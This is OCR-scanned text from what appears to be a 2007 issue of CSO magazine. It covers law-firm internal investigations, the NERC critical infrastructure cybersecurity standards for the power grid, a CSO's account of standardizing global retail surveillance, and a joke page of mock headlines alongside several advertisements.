that  was  recently  in  the  news  for  its  investigation  into  how  stock 
options  were  granted  at  UnitedHealth.  Firms  like  these  use 
different  methods  than  investigations  firms. 

“We  have  a  lot  of  clients  who  turn  to  us  to  do  investigations, 
but  they’re  not  going  to  go  out  and  find  somebody’s  phone 
records,”  says  one  attorney  who  works  on  white-collar  investi¬ 
gations  for  a  large  law  firm,  who  spoke  on  condition  that  he  not 
be  identified.  “Normally,  the  heart  of  the  internal  investigation 
work  we  do  is,  the  company  is  giving  you  access  to  e-mail  sys¬ 
tems  and  documents  and  access  to  employees  as  well,  usually 
who  are  required  to  cooperate  with  you  on  the  pain  of  being 
fired  if  they  don’t.” 

By  their  very  nature,  law  firms  collect  evidence  to  be  used 
in  court.  Investigations  firms,  on  the  other  hand,  may  want 
information  merely  to  put  them  on  the  right  trail,  whether  it’s 
permissible  as  evidence  or  not.  Either  way,  though,  there’s  a 
huge  gray  area  of  things  that  can  be  done  legally  but  are  widely 
considered  unethical— and  neither  group  has  the  monopoly  on 
ethics.  “Being  an  attorney  makes  you  no  more  ethical  than  any¬ 
body  else  in  the  investigations  business,”  Wipprecht  quips. 

There  is  one  big  difference,  however.  Investigations  done 
by  law  firms  are  decidedly  more  expensive  than  ones  done  by 
investigative  firms.  Debevoise  &  Plimpton’s  investigation  into 
Vioxx  reportedly  took  20  months  and  cost  $21  million.  If  com¬ 
panies  do  turn  increasingly  to  law  firms,  it  will  be  because  they 
have  other  ways  to  justify  the  cost. 

And  what  would  that  be?  “Law  firms  have  always  been  used 
principally  to  make  sure  the  information  gathered  is  covered 
by  attorney-client  privilege,”  Becker  says. 

It’s  not  a  foolproof  strategy,  though.  That  HP  memo  we 
recounted  earlier?  Each  and  every  page  of  it  carried  a  stern 
warning:  “Attorney-Client  Privileged.” 

Reality  check:  Investigations  done  by  law  firms  are  too 
expensive  to  justify  just  for  the  investigation’s  sake.  ■ 


Reach  Senior  Editor  Sarah  D.  Scalet  at  sscaletwcxo.com. 
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IN  THIS  STORY  How 

cybersecurity  standards 
affect  physical  assets 
Details  on  the  standards 


IT  TOOK  FOUR  YEARS  ,  twice  as  long 

as  Larry  Bugh  thought  it  would,  but  the 
nation  now  has  a  proposed  set  of  standards 
designed  to  help  protect  the  North  American 
power  grid  from  cyberattack.  These  stan¬ 
dards,  dubbed  critical  infrastructure  protec¬ 
tion  Permanent  Cyber  Security  Standards 
and  released  by  the  North  American  Electric 
Reliability  Council  (NERC)  in  May,  represent 
what  appears  to  be  the  first  set  of  security 
standards  to  address  every  aspect  of  cyber¬ 
security,  including  operation,  management 
and  even  the  physical  safety  of  cyberassets. 

The  Federal  Energy  Regulatory  Commis¬ 
sion  (FERC)  is  poised  to  adopt  these  stan¬ 
dards,  which  have  the  potential  to  be  seen  as 
a  model  by  players  in  other  industries  that 
make  up  the  nation’s  critical  infrastructure. 

Bugh  is  a  leading  player  in  the  standards 
effort.  He  is  CSO  at  ReliabilityFirst,  one  of 
the  eight  U.S.  reliability  councils  that  moni¬ 
tor  and  enforce  good  reliability  practices  in 


the  power  industry.  He  chaired  the  25-mem- 
ber  NERC  standards  draft  team,  which  was 
formed  in  early  2003.  The  federal  govern¬ 
ment  asked  the  team  to  discuss  how  electric 
providers  should  respond  to  industry  trends 
that  showed  a  growing  number  of  electrical 
utilities  connecting  their  control  systems  to 
their  computer  networks. 

Those  powerful  network  links  led  to  some 
real  disconnects  between  professionals  with 
different  areas  of  expertise.  Bugh  says  that 
executives  at  many  utilities  were  unfamiliar 
with  the  idea  of  having  to  protect  control  sys¬ 
tems  from  cyberattack  since,  in  the  past,  con¬ 
trol  systems  have  typically  been  kept  separate 
from  other  systems.  But  as  technology  has 
evolved  and  the  power  industry  has  looked  for 
operational  efficiencies,  control  systems  have 
become  more  connected  to  computer  systems 
and  the  Internet,  and  therefore  are  emerging 
computer  security  threats.  (See  “Out  of  Con¬ 
trol,”  www.csoo7iline.com/reod/0801 04.) 
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Critical  Infrastructure 


Meanwhile,  computer  security  experts  had  trouble  adapting  to 
the  idea  that  any  cybersecurity  protections  needed  to  be  imple¬ 
mented  in  ways  that  did  not  so  much  as  slow  down  the  control 
systems. 

So  NERC,  whose  7,500  members  comprise  most  of  the  electric 
sector  entities  (including  cooperatives,  government  and  investor- 
owned)  in  the  United  States  and  Canada,  as  well  as  those  in  Baja, 
Mexico,  set  up  the  draft  team  to  devise  the  original  standards  in 
August  2001. 

“We  knew  we  were  breaking  new  ground,  and  we  knew  it  would 
be  controversial,”  Bugh  says  of  the  effort  and  its  intended  product. 
Even  still,  he  figured  it  would  take  only  a  couple  of  years  to  work 
things  out.  But  a  first  draft  that  generated  900  pages  of  comments 
from  NERC  members  was  a  sign  of  how  much  work  was  ahead. 

Standards  with  Muscle 

The  new  critical  infrastructure  protection  (CIP)  standards  stand 
out  both  for  their  breadth  and  their  teeth— once  FERC  approves 
the  CIP  standards,  both  the  industry  group  and  the  government 
will  have  the  power  to  fine  member  utilities  that  don’t  comply  with 
them. 

The  standards  are  broad,  affecting  everything  from  the  hir¬ 
ing  process  for  people  who  will  be  responsible  for  cybersecurity 
(including  background  checks),  to  guidelines  for  perimeter  security 


responsibility  and  controls.  They  cover,  among  other  things,  train¬ 
ing  standards,  management  systems,  electronic  security,  physical 
security,  and  incident  reporting  and  response. 

NERC  officials  are  careful  to  note  that  the  new  infrastructure 
standards  cover  only  cybersecurity— the  physical  aspects  of  the 
standard  relate  specifically  to  physically  securing  cyberassets, 
not,  say,  power  transmission  lines  or  turbine  generators.  Still,  the 
effort  will  mean  that  any  piece  of  information  technology  whose 
vulnerability  could  affect  a  control  system’s  operation— whether 
it  be  a  computer  system,  backup  system,  network  equipment  or 
software— needs  to  be  protected. 

That  risk  coverage  is  a  noteworthy  step,  says  Dale  Peterson, 
director  of  the  consulting  practice  at  Digital  Bond,  a  company  that 
consults  on  supervisory  control  and  data  acquisition,  or  SCADA, 
systems  for  a  variety  of  industries,  including  electric  power  genera¬ 
tors.  Peterson  has  blogged  extensively  (at  www.digitalbond.com ) 
about  the  NERC  standards  as  they  have  been  developed.  “There 
are  no  other  standards  in  the  cybersecurity  space  that  say  ‘you  must 
do  this,’  and  have  a  measurement  component  and  have  an  audit 
plan,”  he  says. 

Peterson  says  this  represents  a  significant  shift  from  the  guideline 
documents  common  to  this  industry,  which  have  loose  recommen¬ 
dations.  “These  say  ‘must’  or  ‘shall.’  These  standards  can  be  audited, 
and  you  can  say  if  it’s  compliant  or  noncompliant,”  he  says. 


Mission  Critical 

The  North  American  Electric  Reliability 
Council’s  new  cybersecurity  standards 
for  critical  infrastructure  protection  have 
eight  categories,  which  apply  utility  risk 
management  analyses  to  networked  systems. 
A  thumbnail  description  of  the  main  areas: 


Critical  Cyberassets  Defines 
critical  cyberassets  involved 
in  power  generation,  such  as 
control  center  assets,  trans¬ 
mission  substations,  backup 
generators,  protection  systems 
and  equipment  involved  in 
restoring  power  supplies.  Such 
assets  could  include  moni¬ 
toring  and  control  systems, 
automatic  generation  controls, 
real-time  power  system  model¬ 
ing  tools,  real-time  interutility 
data  exchanges  and  network 
communication  protocols. 


Security  Management 
Controls  Establishes  require¬ 
ments  for  formal  cybersecurity 
policies,  such  as  identifying 
a  lead  security  manager  and 
reporting  on  changes  and 
exceptions  in  security  controls. 
Personnel  and  Training 
Requires  at  least  one  cyber¬ 
security  training  exercise  per 
quarter,  plus  annual  training. 
Also  requires  preemployment 
background  checks. 

Electronic  Security  Requires 
establishing  a  security 


perimeter  (including  access 
controls)  and  performing  cyber¬ 
vulnerability  assessments  and 
securing  cyberassets.  Includes 
monitoring  network  traffic, 
intrusion  detection  and  data 
retention. 

Physical  Security  Establishes 
plan  for  protecting  physical 
equipment  needed  for  cyber¬ 
security.  Includes  guidelines 
for  housing  such  equipment 
behind  walls  and  monitoring 
physical  access  to  systems, 
with  provisions  for  escorts, 
alarms  and  video  surveillance. 
Systems  Security  Manage¬ 
ment  Establishes  rules  for 
how  to  securely  manage  and 
monitor  information  systems 
and  test  procedures  for  vulner¬ 
ability  assessments.  Sets  up 
provisions  for  what  constitutes 
a  significant  systems  change, 


such  as  implementing 
patches,  new  versions  of 
software,  service  packs,  and 
new  custom  or  third-party 
applications. 

Incident  Reporting  and 
Response  Planning  Sets 
up  a  computer  incident 
response  team  as  a  require¬ 
ment.  Mandates  that  all 
incidents  be  reported  to 
the  Electricity  Sector  ISAC 
(information  sharing  and 
analysis  center). 

Recovery  Plan  Establishes 
disaster  recovery  plan, 
annually  reviewed.  Details 
the  severity  and  types  of 
attacks  that  would  trigger  a 
recovery  effort  and  what  that 
effort  should  consist  of,  and 
requires  defining  the  roles  and 
responsibilities  of  those  who 
will  respond.  -M.F. 
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Covering  Digital  and  Physical  Ground 

The  new  critical  infrastructure  protection  Permanent  Cyber  Secu¬ 
rity  Standards  replaced  an  earlier  version  developed  in  the  wake 
of  the  September  11  attacks.  That  version,  called  the  Urgent  Action 
Cyber  Security  Standard  (also  known  as  CIP  1200),  was  approved 
the  day  before  the  August  2003  blackout  and  was  considered  a 
temporary  measure. 

The  NERC  group  working  on  the  new  critical  infrastructure 
protection  standards  used  CIP  1200  as  a  jumping-off  point,  but 
the  new  standards  are  far  broader,  with  eight  categories  covering 
the  gamut  of  physical,  operational  and  cybersecurity  challenges. 
Among  other  things,  the  standards  would  require:  background 
checks  of  potential  employees,  access  authorization  on  both  the 
physical  and  systems  side  of  a  utility,  and  establish¬ 
ment  of  a  full-scale  disaster  response  and  restoration 
plan  for  both  cyber  and  physical  incidents.  (See  “Mis¬ 
sion  Critical,”  opposite  page.) 

Peterson  says  that  electricity  providers  will  be  able 
to  read  the  standards  and  understand  how  to  build  a 
complete  security  program.  NERC  also  has  organized 
seminars  where  people  like  Bugh  talk  through  the 
standards  with  power  industry  managers. 

The  standards  themselves  still  face  some  politicking. 

The  NERC  board  approved  them  and  considers  them 
in  effect  for  its  members  as  of  June  1,  2006.  But  NERC 
only  submitted  the  standards  to  FERC  in  August,  and 
the  federal  agency  has  no  deadline  for  adopting  these 
standards  as  government  policy.  NERC  also  is  nego¬ 
tiating  with  other  parties  in  the  North  American  grid, 
including  the  provinces  and  other  regulatory  bodies  in 
Canada  and  the  Mexican  state  of  Baja.  Thus  far,  the 
province  of  Ontario  has  signed  a  memorandum  of  understanding 
to  adopt  the  NERC  cybersecurity  standards. 

FERC  will  release  a  Notice  of  Proposed  Rule  Making  and  allow 
for  public  comments  on  the  standards.  It  may  not  give  them  a 
rubber  stamp,  though:  NERC  submitted  102  standards  to  FERC 
for  approval  in  its  initial  application  to  become  the  nations  first 
Electric  Reliability  organization,  an  entity  created  by  the  Energy 
Policy  Act  of  2005.  FERC  has  reviewed  that  list  but  remanded  20 
of  the  proposed  standards  to  NERC  with  specific  comments  about 
what  needs  to  be  done  for  it  to  approve  them.  While  FERC  could 
send  back  some  or  all  of  the  new  CIP  standards,  Stan  Johnson, 
a  manager  of  situation  awareness  and  infrastructure  security  at 
NERC,  says  he  expects  the  standards  to  be  approved  by  June. 

Members  of  NERC’s  drafting  team  says  they  tried  to  make 
up  for  the  lack  of  hands-on  examples  contained  in  the  standards 
by  creating  a  three-point  framework.  “We  had  to  consider  three 
things:  the  [potential  cybersecurity]  threat,  the  consequence  of  an 
event  and  the  vulnerability,”  says  George  Miserendino,  president 
of  Triton  Security  Solutions.  Miserendino  was  on  the  CIP  cyber¬ 
security  drafting  team,  representing  Edison  Electrical  Institute. 

The  huge  blackout  of  Aug.  14,  2003,  in  which  a  software  glitch 


at  a  single  electrical  provider  in  Ohio  cascaded  into  an  event  in 
which  50  million  people  in  North  America  lost  power,  underscored 
the  importance  of  the  reliability  standards  discussion.  But  Miser¬ 
endino  says  that  the  group’s  biggest  motivator  was  the  threat  that 
FERC  might  come  in  and  do  the  regulating  for  it.  In  part,  he  says, 
that’s  because  the  2005  Energy  Act  made  FERC  responsible  for 
electrical  transmission  reliability  and  gave  the  federal  agency  the 
ability  to  fine  utilities  for  noncompliance. 

Even  with  the  threat  of  government  regulation,  Miserendino 
says,  gaining  consensus  within  NERC  on  self-regulation  took  almost 
three  years.  “The  difficult  thing  was  convincing  people  this  was  the 
first  step  in  an  evolution  and  not  an  end  unto  itself,”  he  says. 

The  standards  have  room  to  evolve.  While  more  than  88  per¬ 
cent  of  NERC’s  members  voted 
to  approve  them— approval 
required  two-thirds  — there 
were  still  some  “no”  votes 
cast.  NERC  noted  objections 
when  it  announced  the  critical 
infrastructure  protection  stan¬ 
dards:  implementation  costs, 
combined  with  the  potential 
for  little  or  no  return  on  that 
spending;  requirements  that 
went  beyond  critical  cyberassets 
at  bulk  power  system  control 
centers;  and  some  ambiguous 
asset  definitions.  FERC  may  ask 
for  clarification  on  any  of  these 
issues.  FERC  might  also  balk  at 
the  industry  being  its  own  audi¬ 
tor.  But  no  one  expects  wholesale  rejection  by  FERC. 

What  remains  unclear  is  whether  the  standards  will  have  any 
impact  on  other  elements  of  U.S.  critical  infrastructure,  such  as 
the  chemical,  water,  or  oil  and  gas  industries.  “Eve  told  my  friends 
in  chemical  and  oil  and  gas  that  they  could  take  those  NERC  stan¬ 
dards,  change  the  definition  of  what  a  cybersecurity  asset  is  and 
use  them  as  they  are,”  says  Peterson.  He  suspects  that  won’t  hap¬ 
pen,  in  part  because  of  industry  politics  and  in  part  for  regulatory 
reasons— FERC  has  both  a  measuring  stick  to  gauge  compliance 
and  a  rod  to  punish  failures.  Other  industries  have  fewer  cyber¬ 
security  rules. 

Johnson  from  NERC  says  that  his  organization  has  had  only 
generic  talks  about  cybersecurity'  with  the  chemical  industry.  But 
its  CIP  standards  have  caught  the  attention  of  the  nuclear  power 
industry  and  the  water  sector,  both  of  which  are  interested  in  how 
the  standards  came  about.  It  may  be  that  Bugh  and  his  drafting 
team  have  created  a  landmark  in  cybersecurity  that  will  ripple 
beyond  the  electric  power  industry.  ■ 

Michael  Fitzgerald  is  a  freelance  writer  based  near  Boston.  Send  comments  to 
csolettersacxo.com. 
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Eyes  on  the  World 

The  need  to  standardize  our  surveillance  systems 
seemed  obvious— until  we  had  to  sell  the  idea 
globally  By  Anonymous 

REMEMBER  FONDLY  MY  first  surveillance  system.  A  small, 
relatively  inexpensive  VHS-based  system  for  one  retail  location,  it 
consisted  of  a  few  pan-tilt-zoom  and  stationary  cameras.  As  the  store’s 
loss  prevention  manager,  I  was  responsible  for  ensuring  the  quality  of 
the  images  by  adjusting  the  recording  levels,  cleaning  the  recorders 
and  maintaining  new  tapes  for  the  VCRs.  All  in  all,  the  system  worked  well, 
and  it  helped  us  reduce  employee-related  losses  and  shoplifting. 

Twenty  years  later,  I’m  the  CSO  of  a  global  retailer  whose  business  model 
requires  intense  surveillance,  and  things  are  considerably  more  complicated. 
When  I  was  hired,  the  surveillance  system  desperately  needed  to  be  modern¬ 
ized.  There  were  too  many  different  systems  from  too  many  vendors,  and  the 
quality  went  from  bad  to  worse. 

Image  quality  was  rarely  good 
enough  to  support  a  finding. 

Coverage  was  simplistic,  pro¬ 
viding  more  opportunity  than 
deterrence.  And  the  systems 
required  too  much  local  support 
to  keep  tapes  fresh  and  libraries 
current.  The  company  needed 
a  strategic,  long-term  approach 
to  move  away  from  VHS-type 
systems. 

How  hard  could  that  be? 

Harder  than  I’d  thought.  As  it 
turns  out,  decisions  about  sur¬ 
veillance  systems  need  a  lot 
more  companywide  involvement, 
communication,  business  acu¬ 
men  and  cultural  sensitivity  than 
I  ever  imagined  back  when  I  was 
working  on  those  early  cameras. 

Time  for  Standards 

My  group  and  I  got  started  by 
creating  a  standard  for  video  surveillance  based  on  both  performance  and 
operational  drivers  within  our  U.S.  business  environment.  We  decided  that 
the  systems  needed  to  be  digitally  based  with  hard-drive  storage  so  that  all 
cameras  recorded  continuously.  Recording  would  have  a  minimum  image- 
per-second  frame  rate  and  video  resolution.  In  addition,  the  systems  needed 
to  be  network-friendly,  to  allow  for  remote  access  to  live  and  recorded  video, 
remote  serviceability  and  remote  monitoring  for  equipment  failure  or  other 
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alarm  conditions.  Finally,  the  systems  had  to  require 
little  to  no  local  intervention. 

We  did  a  full  analysis  of  systems  and  providers  and 
identified  the  most  cost-efficient  system  with  the  best 
capabilities  and  long-term  flexibility.  We  chose  one 
provider  for  our  surveillance  product  and  one  integra¬ 
tor  who  would  be  responsible  for  installation  into  our 
physical  security  network. 

We  presented  the  new  platform  to  the  company’s 
U.S.  senior  managers,  making  a  case  that  costs  would 
be  offset  by  reduced  maintenance,  service  and  train¬ 
ing  costs,  as  well  as  improved  performance,  speed  and 
quality  of  the  new  digital  system.  Senior  management 
determined  that  it  was  a  solid  strategic  investment  for 
the  company. 

We  established  a  plan  to  roll  out  all  the  surveillance 
systems  across  the  United  States  within  five  years. 
Rather  than  paying  for  everything  up  front,  we  agreed 
to  a  strategy  of  upgrading  as  the  company  opened  new 
locations  and  renovated  existing  locations,  as  well  as 
through  annual  capital  requests  allocated  to  the  secu¬ 
rity  department.  Basically, 
if  we  planned  to  remodel 
a  location  within  five  years, 
we  could  build  the  new  sys¬ 
tem  into  the  remodeling 
costs.  Otherwise,  we  used 
security  capital. 

Not  only  was  the  U.S. 
transition  a  great  achieve¬ 
ment,  we  also  had  success 
in  introducing  the  new 
platform  in  some  of  our 
international  locations 
that  were  newly  opened 
or  undergoing  significant 
renovation.  Because  of  this 
success,  security  decided  to 
extend  the  new  platform  to 
all  our  international  divi¬ 
sions.  This  wasn’t  without 
precedent;  the  company 
had  standardized  many  of 
the  information  technol¬ 
ogy  systems.  Therefore, 
we  assumed  that  the  acceptance  by  U.S.  management 
guaranteed  it  internationally. 

Going  Global 

As  we  had  in  the  United  States,  we  decided  to  upgrade 
all  the  systems  within  five  years.  Again,  this  was  to 
be  accomplished  through  the  opening  of  new  loca- 
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tions,  renovations  and  department  capital 
spending.  However,  as  soon  as  we  began 
planning  the  improvements,  international 
management  began  to  push  back. 

First,  the  managing  directors  of  our 
international  markets  expressed  disap¬ 
pointment  that  they  had  not  been  involved 
with  the  decision-making  process.  This 
was  especially  important  in  light  of  a  dif¬ 
ference  between  how  domestic  and  inter¬ 
national  divisions  handle  their  finances. 
In  the  United  States,  managing  directors 
were  responsible  for  sales  targets  and 
expense  plans,  but  they  were  not  allowed 
to  adjust  their  expenditures  to  drive 
additional  sales  and  earnings.  Interna¬ 
tional  managing  directors,  however,  were 
directly  responsible  for  growing  their 
topline  revenue.  They  could  adjust  their 
expenditures  significantly— provided  that 
they  drove  additional  sales  and  earnings. 
Now,  they  questioned  the  ROI  of  the 
new  surveillance  systems,  especially  in 
markets  that  had  much  lower  crime  and 
a  less  valuable  inventory  allocation  than 
our  locations  in  the  United  States.  For  the 
most  part,  they  agreed  that  the  systems 
needed  to  be  upgraded,  but  they  felt  that 
any  DVR  system  would  be  fine. 

I  remember  vividly  a  conversation  with 
one  of  our  international  vice  presidents, 
who  indicated  that  he  didn’t  want  to 
spend  that  kind  of  money  on  “just  a  cam¬ 
era  system.”  He  had  other  capital  priorities 
where  he  thought  his  money  should  be 
allocated.  His  money?  I  thought  it  was  our 
money.  We  were  so  familiar  with  the  U.S. 
model  that  we  missed  the  point  that  inter¬ 
national  divisions  had  more  of  a  financial 
interest  than  their  U.S.  counterparts. 

They  also  argued  that  they  could  pur¬ 
chase  the  technologies  and  components 
less  expensively  from  local  markets.  They 
said  they  couldn’t  justify  the  costs  associ¬ 
ated  with  the  foreign  systems. 

I  hadn’t  expected  this  type  of  opposition. 
I  had  believed  that  there  would  be  some 
minor  opposition,  but  I  never  anticipated 
being  challenged  on  the  quality  of  our  stan¬ 
dard— we’re  the  experts,  after  all.  But  it  did 
lead  to  a  healthy  dialogue,  and  now  we’re 
considering  our  options. 


A  Different  Approach 

One  of  our  main  mistakes  was  underes¬ 
timating  the  need  to  market  the  benefits 
of  the  surveillance  system  to  international 
management.  Now,  we’re  trying  to  high¬ 
light  examples  that  demonstrate  its  ROI. 
When  international  management  visits 
the  United  States,  we  give  them  a  tour 
of  the  global  security  center  to  show  how 
we  will  be  able  to  pull  video  from  any  site 
upon  request— normally  a  time-consum- 


I  now  appreciate 
that  a  strategic 
companywide 
investment  should 
be  vetted  through 
all  business 
channels  prior  to 
implementation  in 
the  United  States. 

ing  process  for  store  managers.  We’ll  also 
focus  on  the  fact  that  the  global  security 
center  can  monitor  all  surveillance  sys¬ 
tems  worldwide  to  ensure  that  the  systems 
are  functioning  properly,  which  will  take 
some  burden  off  the  stores. 

If  that  doesn’t  work,  one  option  we’re 
considering  is  scaling  the  standard  invest¬ 
ment  against  risk.  For  instance,  a  higher- 
risk  operation,  such  as  a  standalone  store, 
would  have  to  meet  a  higher  standard 
than  a  lower-risk  location,  such  as  a  store 
within  a  mall.  The  overall  design  of  the 
system  might  be  a  compromise  in  size, 
price  and  capability— as  long  as  it  main¬ 
tains  a  few  of  the  critical  performance  and 
operational  drivers. 

Another  option  is  a  more  culturally 
sensitive  approach.  In  this  scenario,  we 
would  wholly  maintain  the  standard. 
However,  the  investment  would  be  bro¬ 
ken  down  into  components,  and  we  would 
allow  local  management  and  security  to 


identify  components  that  could  be  sourced 
less  expensively  using  local  manufacturing 
and  expertise.  This  approach  is  more  likely 
in  the  Asia-Pacific  region,  where  electron¬ 
ics  manufacturing  is  concentrated  and 
local  allegiances  are  strong.  The  option 
has  some  risks,  especially  those  associated 
with  assembling  a  surveillance  system 
with  components  from  multiple  sources. 
Also,  critical  components  will  need  to  be 
provided  by  our  primary  vendor,  so  it’s  not 
clear  how  much  money  this  would  actually 
save.  Nonetheless,  it  could  engender  good 
feelings  with  local  management  and  staff. 

Lastly,  we  have  the  option  to  mandate 
compliance  despite  international  man¬ 
agement’s  objections.  We  could  make  a 
strong  case  to  executive  management  that 
it  doesn’t  matter  how  local  managers  feel, 
because  the  surveillance  platform  is  part 
of  a  broader  strategic  investment.  This  is 
a  last  resort,  however,  because  it  would 
probably  lead  to  further  alienation  and  to 
the  deterioration  of  security’s  partnership 
with  international  management. 

In  the  end,  I  believe  that  our  commit¬ 
ment  to  communicate  the  value  of  the 
standard  will  enable  us  to  migrate  our  full 
platform  successfully  in  at  least  90  percent 
of  our  international  markets.  For  the  other 
10  percent,  I  fear  it  will  be  an  endless  “lost 
in  translation”  issue  requiring  security  to 
compromise  in  favor  of  a  locally  sourced 
option. 

It’s  been  a  long  time  since  I  did  that 
simple  one-store  surveillance  installation. 
The  dynamics  of  expanding  surveillance  to 
a  strategic  investment  at  a  global  organiza¬ 
tion  are  inherently  complex.  We  must  care¬ 
fully  research,  market  and  communicate  in 
order  to  establish  a  standard  that  fits  glob¬ 
ally.  We  need  a  thorough  business  case  that 
explores  the  financial  implications  to  all 
aspects  of  the  organization.  I  now'  appre¬ 
ciate  that  a  true  strategic  companywide 
investment  should  be  vetted  through  all 
business  channels  prior  to  implementation 
in  the  United  States.  This  is  the  mark  of  a 
security  organization  that  is  truly  global.  ■ 

Undercover  is  written  by  a  real  CSO.  Send  comments  to 
csoundercoveri4cxo.com. 
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It’s  OK  to  show  off  to  your 
friends  that  you  were  in  CSO. 


But  it’s  even  better  to 
show  your  customers. 


What  better  way  to  inform  your  key  customers 
of  your  editorial  coverage  in  CSO  than  through 
customized  Editorial  Reprints? 

Leverage  the  positive  impact  of  your  editorial 
coverage  by  using  reprints  for  direct  mail 
campaigns,  seminar  promotions,  employee 
communications,  recruiting  and  marketing 


programs.  Let  us  enhance  your  reprints  with  your 
company’s  logo,  address,  and  sales  message. 
Reprints  make  great  SALES  tools  for  trade  shows, 
mailings  or  media  kits. 

And  while  a  framed  copy  of  your  article  will  look 
neat  on  your  wall,  it  will  look  even  better  in  the 
hands  of  your  customers. 


CSO 

The  Resource  for 
Security  Executives 


For  more  information  on  customized  editorial  reprints  in  volume  quantities,  contact: 
Jennifer  Eclipse  at  212.221.9595  x237  or  email  jeclipse@parsintl.com. 

Website:  www.magreprints.com/quickquote.asp 
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2007  Headlines 

Second  Lite  Hires  CSO 

Avatars  claim  security  “virtually  nonexistent 


Statueofm 

Liberty 

Stolen 

High  copper  prices  make 
Lady  Liberty  worth  $10 
million  at  scrapyards 


nawDiscoveredin  Windows  Vista! 

Government  approves  wiretapping 
of  all  restaurant,  bar  conversations 

Move  necessary  because  “idle  chitchat  provides  perfect  cover 
for  terrorist  plotting,’’  Feds  say 


Mona  Lisa  Missing! 

Tom  Hanks  meets  Audrey  Tautou  in  Paris 
to  investigate 

Jfresident’s 
Wenlity  Stolen 

b'8 Ssma  f  TThTw  u?  on  W?* 

credit  card  statement 


Flight  Delayed 
12  Hours  by  Perrier 

"There  was  a  shady-looking  guy  drinking 
fizzy  liquid,”  says  another  passenger  on 
Toledo-to-Appleton  flight 
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ILLUSTRATION  BY  JIM  HAYNES 


CISA 

Certified  Information  Systems  Auditor'" 


Exam  Registration  Deadline:  11  April  2007 
Exam  Date:  9  June  2007 


www.isaca.org/csomag 
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SECURITY  MANAGER* 
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Serving  IT  Governance  Professionals 


For  DHL, 
the 

of  IT  delivers 
over  four  million 

promises  a  day. 


Unified  and  simplified  package  tracking:  a  logistical  dream. 

The  best  way  for  DHL,  the  world  leader  of  delivery  services,  to  move  more  packages  is  to 
move  more  information.  CA  software  solutions  helped  DHL  to  unify  and  simplify  its  global 
package  tracking  systems.  This  increased  efficiency  gave  DHL  the  ability  to  deliver  over 
one  billion  promises  more  accurately  each  year.  It's  more  proof  that  customer  service  is 
back  in  shipping.  Learn  how  CA  software  solutions  enable  enterprises  like  DHL  to  realize 
the  full  power  of  IT  at  ca.com/customers. 
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